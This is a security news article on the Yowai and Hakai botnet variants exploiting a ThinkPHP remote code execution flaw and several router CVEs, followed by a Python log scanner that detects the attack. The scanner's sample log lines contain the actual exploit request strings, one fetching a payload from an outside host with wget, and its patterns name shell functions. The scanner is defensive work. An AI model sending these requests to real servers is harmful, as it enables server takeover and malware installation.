A remote code execution vulnerability in the ThinkPHP framework, which allows attackers to take control of web servers, was patched in December 2018. However, the Mirai variant Yowai and the Gafgyt variant Hakai have since been spotted exploiting it for botnet propagation.
Yowai uses the flaw to breach web servers built on the framework, and it also carries out dictionary attacks against routers to enlist them in DDoS (Distributed Denial of Service) attacks. Trend Micro’s telemetry revealed a sudden increase in Hakai and Yowai attacks between January 11 and 17, 2019.
Mirai variant Yowai
Researchers from Trend Micro observed that Yowai adds the ThinkPHP vulnerability to its list of infection entry vectors alongside other known vulnerabilities. Trend Micro explained in a blog post that Yowai listens on port 6 for commands from its C&C server.
Apart from the ThinkPHP flaw, Yowai also exploits CVE-2014-8361 (Realtek SDK miniigd UPnP SOAP RCE), a Linksys RCE, CVE-2018-10561 (Dasan GPON router authentication bypass), and a CCTV-DVR RCE.
Gafgyt variant Hakai
The Gafgyt variant Hakai has been observed exploiting router vulnerabilities to propagate and infect Internet of Things (IoT) devices. Trend Micro researchers found that the Hakai sample they analysed (detected by Trend Micro as BACKDOOR.LINUX.HAKAI.AA) targets bugs that remain unpatched on many systems, adding exploits for the ThinkPHP vulnerability and several others to propagate and launch DDoS attacks.
The others include a D-Link DSL-2750B router vulnerability, CVE-2015-2051 (D-Link HNAP command injection), CVE-2014-8361 (Realtek SDK miniigd UPnP SOAP RCE), and CVE-2017-17215 (Huawei HG532 RCE).
“Interestingly, the Hakai sample we examined contained codes copied from Mirai, specifically the functions used for encrypting its configuration table. However, the functions we’ve identified are not operational; we suspect that the codes for telnet dictionary attack were intentionally removed to make this Hakai variant stealthier,” the researchers explained in the blog post.
Researchers noted that ThinkPHP is a free, open-source PHP framework, which makes unpatched installations an easy target; Yowai and Hakai abuse the vulnerability to breach web servers and websites.
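As an added example, not taken from the page or from Trend Micro's report: a small Python scanner that flags the ThinkPHP 5.x `invokefunction` request pattern in web-server access logs, which is the request shape the December 2018 patch closed. The indicator strings come from the public advisory and exploit write-ups for that flaw, not from this article; the log lines and IP addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines in Common Log Format (not taken from the page
# or from Trend Micro's report). The documentation-range IPs are placeholders.
SAMPLE_LOG = r"""
203.0.113.10 - - [12/Jan/2019:03:14:07 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2019:03:15:22 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jan/2019:03:16:01 +0000] "POST /index.php?s=captcha HTTP/1.1" 200 77 "-" "curl/7.58.0"
192.0.2.55 - - [12/Jan/2019:03:17:40 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=shell_exec&vars%5B1%5D%5B%5D=wget%20http://203.0.113.99/x HTTP/1.1" 500 0 "-" "-"
"""

# Common Log Format: ip ident user [timestamp] "METHOD URL PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Indicators of the ThinkPHP 5.x invokefunction RCE pattern, taken from the public
# December 2018 advisory and exploit write-ups (not from this page). Matching is done
# on the URL-decoded request so %5C/%5B obfuscation does not evade it.
INDICATORS = [
    ("thinkphp_invokefunction", re.compile(r"\\think\\app/invokefunction", re.I)),
    ("call_user_func_array", re.compile(r"function=call_user_func_array", re.I)),
    ("shell_function_in_vars",
     re.compile(r"vars\[0\]=(system|shell_exec|exec|passthru|popen)\b", re.I)),
]


def scan_access_log(text):
    """Return one hit per request line that carries any ThinkPHP RCE indicator.

    Only the request line is inspected, so POST bodies (where later variants of
    the exploit put their payload) are out of scope for this check.
    """
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        url = unquote_plus(m.group("url"))
        matched = [name for name, rx in INDICATORS if rx.search(url)]
        if matched:
            hits.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "indicators": matched,
                "url": url,
            })
    return hits


def summarize_by_ip(hits):
    """Count flagged requests per source IP; a 200 on a flagged request deserves triage first."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["ip"]} status={hit["status"]} {",".join(hit["indicators"])}')
        print(f'    {hit["url"]}')
    print(summarize_by_ip(scan_access_log(SAMPLE_LOG)))
```

The scanner decodes the URL before matching because in-the-wild requests often percent-encode the backslashes and brackets. A flagged request that returned 200 is the one to treat as a probable compromise; a 404 or 500 is more likely a failed spray, but the source IP is still worth blocking.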